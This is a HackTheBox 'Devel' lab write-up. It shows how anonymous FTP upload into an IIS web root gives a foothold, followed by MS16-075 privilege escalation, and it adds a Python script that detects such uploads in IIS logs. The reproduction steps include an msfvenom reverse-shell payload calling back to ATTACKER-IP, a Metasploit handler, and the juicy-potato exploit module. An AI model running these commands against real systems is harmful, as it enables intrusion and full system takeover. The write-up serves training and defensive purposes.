Devel CTF Writeup
This is a writeup presented by Behind Security as part of the Road to OSCP series, focusing on the Devel CTF from HackTheBox.
Devel CTF
Devel, while relatively simple, demonstrates the security risks associated with some default program configurations. It is a beginner-level machine which can be completed using publicly available exploits.
HackTheBox
Hack The Box gives individuals, businesses and universities the tools they need to continuously improve their cybersecurity capabilities — all in one place.
Independent Challenge - 10.10.10.5
`export IP=10.10.10.5`
Service Enumeration
| IP Address | Ports Open |
|---|---|
| 10.10.10.5 | TCP: 21, 80 |
Initial Access - Writing files to the web server via a misconfigured FTP server
Vulnerability Explanation: Behind Security noticed that the FTP server's root mirrors the document root of the web server on port 80, and that the anonymous user is allowed to upload arbitrary files. By uploading a malicious .aspx file, which the IIS HTTP server on port 80 then executed when it was requested, Behind Security was able to establish a foothold on the system.
Vulnerability Fix:
- Disable anonymous access to the FTP server to prevent unauthorized file uploads.
- Implement proper access controls and permissions on the web server's file directories, ensuring that only authorized users can modify or upload files.
- Regularly update and patch both the FTP server and the IIS web server software to the latest versions to address security vulnerabilities.
Severity: High
Steps to Reproduce the Attack:
- Generate a malicious aspx file using msfvenom: `msfvenom -p windows/meterpreter/reverse_tcp LHOST=ATTACKER-IP LPORT=54321 -f aspx > evil.aspx`
- Run msfconsole: `msfconsole -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST ATTACKER-IP; set LPORT 54321; run"`
- Log in anonymously to the FTP server on port 21: `ftp anonymous@10.10.10.5`
- Upload your malicious aspx file: `ftp> put evil.aspx`
- Make the web server execute the malicious aspx by requesting `http://10.10.10.5/evil.aspx`
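The misconfiguration above leaves a clear trace in the server's own logs: an anonymous FTP `STOR` of a script file into the web root, followed shortly by an HTTP request for that same file. The following Python script is an added example and is not part of the Behind Security writeup. It parses W3C extended-format log lines (the format IIS uses for both its FTP and web logs) by reading the `#Fields:` header, so the column order of a real deployment does not matter, and correlates accepted anonymous uploads of server-side script files with later web requests for them. The log lines, IP addresses and file names embedded in it are constructed for illustration.

```python
"""Correlate anonymous FTP uploads of script files with web requests for them.

Added example, not code from the Behind Security writeup. The log lines below
are constructed to resemble IIS FTP and IIS web (W3C extended) logs.
"""
import os

# Extensions that the IIS request pipeline hands to a script engine. A file with
# one of these extensions landing in the web root via FTP is a code-execution
# path, which is exactly the misconfiguration the writeup describes.
SCRIPT_EXTENSIONS = {".aspx", ".asp", ".ashx", ".asmx", ".php", ".cshtml"}

# Constructed sample of an IIS FTP log. The login succeeds as "anonymous", then
# several uploads are attempted; only the accepted (2xx) script uploads matter.
FTP_LOG = """\
#Software: (constructed sample)
#Fields: date time c-ip cs-username cs-method cs-uri-stem sc-status
2024-01-10 09:14:02 10.10.14.3 anonymous USER / 331
2024-01-10 09:14:02 10.10.14.3 anonymous PASS / 230
2024-01-10 09:14:20 10.10.14.3 anonymous STOR /evil.aspx 226
2024-01-10 09:20:41 10.10.14.7 anonymous STOR /notes.txt 226
2024-01-10 09:25:05 10.10.14.9 anonymous STOR /shell.asp 550
2024-01-10 09:40:00 10.10.14.20 anonymous STOR /cmd.ashx 226
2024-01-10 10:02:13 10.10.14.12 webadmin STOR /report.aspx 226
"""

# Constructed sample of the matching IIS web log for the same day.
WEB_LOG = """\
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip sc-status
2024-01-10 09:14:55 10.10.10.5 GET /evil.aspx - 80 - 10.10.14.3 200
2024-01-10 09:15:10 10.10.10.5 GET /index.html - 80 - 10.10.14.3 200
2024-01-10 09:30:00 10.10.10.5 GET /notes.txt - 80 - 10.10.14.7 200
"""


def parse_w3c(text):
    """Yield one dict per record, keyed by the names from the #Fields header."""
    fields = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if line.startswith("#"):
            continue  # other directives such as #Software or #Date
        if fields is None:
            raise ValueError("log record appears before a #Fields header")
        values = line.split()
        if len(values) != len(fields):
            continue  # skip malformed lines instead of mis-assigning columns
        yield dict(zip(fields, values))


def anonymous_script_uploads(ftp_log):
    """Return {filename: record} for accepted anonymous STORs of script files."""
    uploads = {}
    for rec in parse_w3c(ftp_log):
        if rec.get("cs-method") != "STOR":
            continue
        if rec.get("cs-username", "").lower() != "anonymous":
            continue
        # 226 means the transfer completed; 4xx/5xx means the server refused it.
        if not rec.get("sc-status", "").startswith("2"):
            continue
        name = os.path.basename(rec.get("cs-uri-stem", "")).lower()
        if os.path.splitext(name)[1] in SCRIPT_EXTENSIONS:
            uploads[name] = rec
    return uploads


def correlate(ftp_log, web_log):
    """Return one alert per uploaded script file that was later requested over HTTP."""
    uploads = anonymous_script_uploads(ftp_log)
    alerts = []
    for rec in parse_w3c(web_log):
        name = os.path.basename(rec.get("cs-uri-stem", "")).lower()
        if name in uploads:
            up = uploads[name]
            alerts.append({
                "file": name,
                "uploaded_by": up["c-ip"],
                "uploaded_at": up["date"] + " " + up["time"],
                "executed_by": rec["c-ip"],
                "executed_at": rec["date"] + " " + rec["time"],
                "http_status": rec["sc-status"],
            })
    return alerts


def triage(ftp_log, web_log):
    """Split findings: executed uploads are critical, the rest still need removal."""
    executed = correlate(ftp_log, web_log)
    seen = {a["file"] for a in executed}
    uploaded_only = sorted(f for f in anonymous_script_uploads(ftp_log) if f not in seen)
    return {"executed": executed, "uploaded_only": uploaded_only}


if __name__ == "__main__":
    result = triage(FTP_LOG, WEB_LOG)
    for a in result["executed"]:
        print(f"CRITICAL {a['file']}: uploaded by {a['uploaded_by']} at {a['uploaded_at']}, "
              f"requested by {a['executed_by']} at {a['executed_at']} (HTTP {a['http_status']})")
    for f in result["uploaded_only"]:
        print(f"WARNING  {f}: anonymous script upload accepted, not yet requested")
```

Run against the constructed logs, the script reports `evil.aspx` as critical (uploaded anonymously, then served with HTTP 200) and `cmd.ashx` as a warning; the refused `shell.asp`, the harmless `notes.txt` and the authenticated `report.aspx` upload are ignored. On a real server, the same correlation should fire on the FTP log alone when anonymous authentication is supposed to be disabled, since any accepted anonymous `STOR` then means the fix from the section above has not been applied.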
Post Exploitation
LPE to Root
Vulnerability Explanation: Further enumeration of the system led to the discovery of a critical vulnerability that allows the user `IIS APPPOOL\Web` to escalate privileges directly to `NT AUTHORITY\SYSTEM`. The vulnerability is identified as MS16-075, and a public exploit is available.
Vulnerability Fix: Microsoft has released a fix for this known issue. It is recommended to conduct regular updates on the system.
Severity: Extreme
Steps to Reproduce the Attack:
- The attacker needs to have a meterpreter session on the victim machine.
- Background the session using the command `bg`.
- Use the exploit `use exploit/windows/local/ms16_075_reflection_juicy` and set the SESSION variable.
- Run the exploit on your meterpreter session and abuse your root privileges.
Conclusion
We hope you have found our content useful and invite you to explore more of our website to discover other interesting topics we cover. From cybersecurity to programming, we strive to provide our readers with the latest and most relevant information that can help them stay informed and ahead of the curve. We are committed to providing the best user experience to you and are open to feedback and suggestions through our contact form. Thank you for choosing Behind Security, we hope to see you again soon!